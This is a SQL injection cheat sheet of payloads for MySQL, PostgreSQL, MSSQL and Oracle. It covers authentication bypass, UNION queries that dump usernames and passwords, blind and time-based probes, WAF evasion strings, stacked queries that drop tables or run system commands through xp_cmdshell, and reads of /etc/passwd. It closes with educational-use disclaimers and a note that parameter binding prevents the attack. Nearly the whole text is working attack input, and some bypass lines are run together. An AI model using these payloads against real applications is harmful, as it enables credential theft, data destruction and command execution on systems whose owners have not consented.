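SQL Injection Cheat Sheet
The strings below only have an effect where user input is concatenated into the SQL text; binding input as parameters removes that injection point on every DBMS listed.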
Basic SQL Injection
' OR '1'='1
' OR 1=1 --
" OR 1=1 --
' OR 'a'='a
') OR ('1'='1
Authentication Bypass
' OR '1'='1' --
' OR '1'='1' /*
' OR 1=1#
admin' --
UNION-Based SQL Injection
Find column count:
' ORDER BY 1--
' ORDER BY 2--
Using UNION:
' UNION SELECT null, null --
' UNION SELECT 1,2,3 --
' UNION SELECT username, password FROM users --
Error-Based SQL Injection
' AND 1=CONVERT(int, (SELECT @@version)) --
' AND 1=CAST((SELECT user()) AS int) --
Blind SQL Injection
' AND 1=1 -- (True)
' AND 1=2 -- (False)
' AND substring(@@version,1,1)='5' --
' AND ASCII(SUBSTRING((SELECT database()),1,1))=100 --
⏱️ Time-Based Blind SQL Injection
' OR IF(1=1, SLEEP(5), 0) -- (MySQL)
'; IF (1=1) WAITFOR DELAY '0:0:5'-- (MSSQL)
WAF Bypass & Obfuscation
%27 OR %271%27=%271(URL encoded)'/**/OR/**/'1'='1' OR 1=1-- -')/**/OR/**/(1=1)--UN/**/ION SEL/**/ECT
Extracting Data
' UNION SELECT table_name, null FROM information_schema.tables --
' UNION SELECT column_name, null FROM information_schema.columns WHERE table_name='users' --
' UNION SELECT username, password FROM users --
Useful Functions (MySQL)
database()
version()
user()
@@datadir
LOAD_FILE('/etc/passwd')
INFORMATION_SCHEMA.TABLES
MySQL Comments & Tricks
-- (Comment)
# (Comment)
/* comment */
' /*!UNION*/ SELECT
Stack Queries (MSSQL)
'; DROP TABLE users --
'; EXEC xp_cmdshell('whoami') --
Bypass Filters
'OR'1'='1'||(SELECT 1)=1' AND CHAR(124)+CHAR(124)+(SELECT 1)=1
Disclaimer
This cheat sheet is intended for educational purposes, penetration testing in authorized environments, and improving application security. Do not use these techniques on systems without explicit permission.
SQL Injection Cheat Sheet by DBMS
Note: Syntax may vary depending on the database. Always tailor payloads to the specific backend.
MySQL
- Version: SELECT @@version;
- Current User: SELECT user();
- Current DB: SELECT database();
- List DBs: SELECT schema_name FROM information_schema.schemata;
- List Tables: SELECT table_name FROM information_schema.tables WHERE table_schema='target_db';
- List Columns: SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
- Read File: SELECT LOAD_FILE('/etc/passwd'); (requires the FILE privilege and is limited by secure_file_priv)
- Time Delay: SLEEP(5)
- Comment Syntax: --|#|/* */
PostgreSQL
- Version: SELECT version();
- Current User: SELECT current_user;
- Current DB: SELECT current_database();
- List Tables: SELECT table_name FROM information_schema.tables WHERE table_schema='public';
- List Columns: SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
- Time Delay: pg_sleep(5);
- Command Execution (with permissions): COPY (SELECT '') TO PROGRAM 'id'; (superuser or pg_execute_server_program membership only)
- Comment Syntax: --
Microsoft SQL Server
- Version: SELECT @@version;
- Current User: SELECT SYSTEM_USER;
- Current DB: SELECT DB_NAME();
- List DBs: SELECT name FROM master..sysdatabases;
- List Tables: SELECT name FROM sysobjects WHERE xtype='U';
- Command Execution: EXEC xp_cmdshell 'whoami'; (xp_cmdshell is disabled by default and needs sysadmin rights to enable)
- Time Delay: WAITFOR DELAY '0:0:5';
- Comment Syntax: --|/* */
Oracle
- Version: SELECT * FROM v$version;
- Current User: SELECT user FROM dual;
- Current DB: SELECT ora_database_name FROM dual;
- List Tables: SELECT table_name FROM all_tables;
- List Columns: SELECT column_name FROM all_tab_columns WHERE table_name='TARGET_TABLE';
- Time Delay: DBMS_LOCK.SLEEP(5);
- Command Execution: Java procedures or external tables (if configured)
- Comment Syntax: --|/* */
Generic Injection Payloads
' OR '1'='1 --
' OR 1=1 --
' UNION SELECT null,null --
' AND 1=0 UNION SELECT username, password FROM users --
Filter Bypass Tricks
'/**/OR/**/'1'='1UNION%0ASELECT' OR 1=1-- -CHAR(97)+CHAR(98)+CHAR(99)(for 'abc')
⚠️ Disclaimer
This content is for educational and authorized penetration testing only. Do not attempt to exploit systems without proper legal consent.